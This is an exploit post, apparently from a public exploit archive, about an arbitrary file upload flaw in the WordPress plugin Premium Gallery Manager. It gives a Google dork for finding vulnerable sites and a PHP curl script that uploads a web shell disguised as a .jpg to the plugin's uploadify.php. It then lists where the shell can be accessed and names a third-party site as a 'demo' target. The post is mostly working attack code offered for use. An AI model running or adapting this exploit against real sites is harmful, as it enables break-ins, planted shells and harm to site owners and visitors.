facebook facebook twitter rss

Wordpress Plugins Premium Gallery Manager Arbitrary File Upload

Author: Aloulou , Published: 08-05-2014
############################################################################

# Title : Wordpress Plugins Premium Gallery Manager Arbitrary File Upload Vulnerability

# Author : Aloulou

# Date : 08/05/2014

# Facebook : http://www.facebook.com/Aloulou.TN

# Email: aloulou@alquds.com

# Vendor : N/a

# Google Dork inurl:"wp-content/plugins/Premium_Gallery_Manager"



# Tested on : Linux



############################################################################



Exploit: shell.php.jpg or .gif

<?php
$uploadfile
="SHELL.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
         array(
'Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
?>



ShellAccess:

http://localhost/wp-content/plugins/Premium_Gallery_Manager/cache/pgallerySHELL.php.jpg

Demo:http://ggd-inc.com/

# Greeting to : CyberPink , Brikovich , Anonboy


############################################################################

Like us on Facebook :